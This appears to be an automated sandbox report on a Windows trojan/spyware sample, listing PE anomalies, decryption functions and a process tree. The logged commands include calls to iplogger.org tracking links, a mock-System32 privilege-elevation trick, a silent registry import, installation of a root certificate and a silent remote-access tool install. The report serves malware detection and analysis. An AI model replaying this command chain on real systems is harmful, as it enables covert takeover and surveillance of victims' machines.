Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC5A38	0_2_04DC5A38
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEF668	0_2_04DEF668
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE90F8	0_2_04DE90F8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEA140	0_2_04DEA140
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DECED0	0_2_04DECED0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE6F60	0_2_04DE6F60
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DE2A50	0_2_04DE2A50
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DED0B8	0_2_04DED0B8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DED0A8	0_2_04DED0A8
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEE3DF	0_2_04DEE3DF
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEE3E0	0_2_04DEE3E0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DEF350	0_2_04DEF350
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 2_2_00FBD7F0	2_2_00FBD7F0
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 2_2_00FBCAB8	2_2_00FBCAB8
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004254D0	17_2_004254D0
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040ECB4	17_2_0040ECB4
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00431F50	17_2_00431F50
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0064022C	19_2_0064022C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0041073E	19_2_0041073E
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040AFF4	19_2_0040AFF4
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301EA60	22_2_0301EA60
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301EA70	22_2_0301EA70
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0301CA7C	22_2_0301CA7C
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07696FD0	22_2_07696FD0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A618	22_2_0769A618
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07691C78	22_2_07691C78
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690B60	22_2_07690B60
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07692B90	22_2_07692B90
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076912B0	22_2_076912B0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076961D8	22_2_076961D8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690040	22_2_07690040
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07696FC0	22_2_07696FC0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697FA9	22_2_07697FA9
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697FB0	22_2_07697FB0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A609	22_2_0769A609
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694E00	22_2_07694E00
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694568	22_2_07694568
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694578	22_2_07694578
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694DF0	22_2_07694DF0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07691C6A	22_2_07691C6A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697498	22_2_07697498
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A368	22_2_0769A368
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07692B7A	22_2_07692B7A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769AB42	22_2_0769AB42
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A359	22_2_0769A359
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694BE0	22_2_07694BE0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07694BD0	22_2_07694BD0
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695278	22_2_07695278
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07699249	22_2_07699249
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07693A40	22_2_07693A40
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07699258	22_2_07699258
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07693A30	22_2_07693A30
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690AD1	22_2_07690AD1
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076912A1	22_2_076912A1
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695288	22_2_07695288
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697978	22_2_07697978
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A920	22_2_0769A920
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769A930	22_2_0769A930
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_076961C8	22_2_076961C8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07697988	22_2_07697988
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_0769506A	22_2_0769506A
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07695078	22_2_07695078
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Code function: 22_2_07690006	22_2_07690006
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F53D48	23_2_00007FF7D9F53D48

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005EA59C appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005BC3D8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005D3750 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005F3814 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005D3A34 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: String function: 005F3590 appears 39 times

PE file contains executable resources (Code or Archives)

Source: servs.tmp.17.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: servs.tmp.17.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

PE file contains more sections than normal

Source: is-PFD3D.tmp.19.dr

Static PE information: Number of sections : 17 > 10

PE file contains strange resources

Source: 1wOdXavtlE.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: servs.tmp.17.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMetroFramework.dll> vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000000.322469152.000000000036B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameIEFRAME.DLL.MUID vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.482401861.0000000001030000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename6Qgb9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532430822.00000000087F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530971740.00000000080C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.477691078.000000000080B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.492060863.0000000003C24000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.476252478.0000000000418000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe

Uses 32bit PE files

Source: 1wOdXavtlE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 1wOdXavtlE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.1wOdXavtlE.exe.400000.0.unpack, BrowserExtension/Data/Crypto/CryptoHelper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@50/66@28/9

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		17_2_004A0E24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		19_2_005ECBC0

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_0041A5FC GetDiskFreeSpaceW,

17_2_0041A5FC

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_00601290 GetVersion,CoCreateInstance,

19_2_00601290

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A16FC FindResourceW,SizeofResource,LoadResource,LockResource,

17_2_004A16FC

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1wOdXavtlE.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\ProgramData\Immunity\rutserv.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$694
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_01

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File created: C:\Users\user\AppData\Local\Temp\tmp379E.tmp

Jump to behavior

Source: Yara match	File source: 00000025.00000002.549143519.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.508478042.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Immunity\is-2SOD7.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''

Source: 1wOdXavtlE.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\pass.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\pass.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Immunity\rutserv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Immunity\rutserv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 1wOdXavtlE.exe	Metadefender: Detection: 16%
Source: 1wOdXavtlE.exe	ReversingLabs: Detection: 58%

Source: servs.exe

String found in binary or memory: rting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked the co

Source: unknown	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe 'C:\Users\user\Desktop\1wOdXavtlE.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Process created: C:\ProgramData\pass.exe C:\ProgramData\pass.exe
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Source: C:\ProgramData\pass.exe	Process created: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp 'C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp' /SL5='$10584,9506241,724480,C:\ProgramData\pass.exe'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'regedit /s C:\ProgramData\Immunity\ses.reg'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\Immunity\install.cmd''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
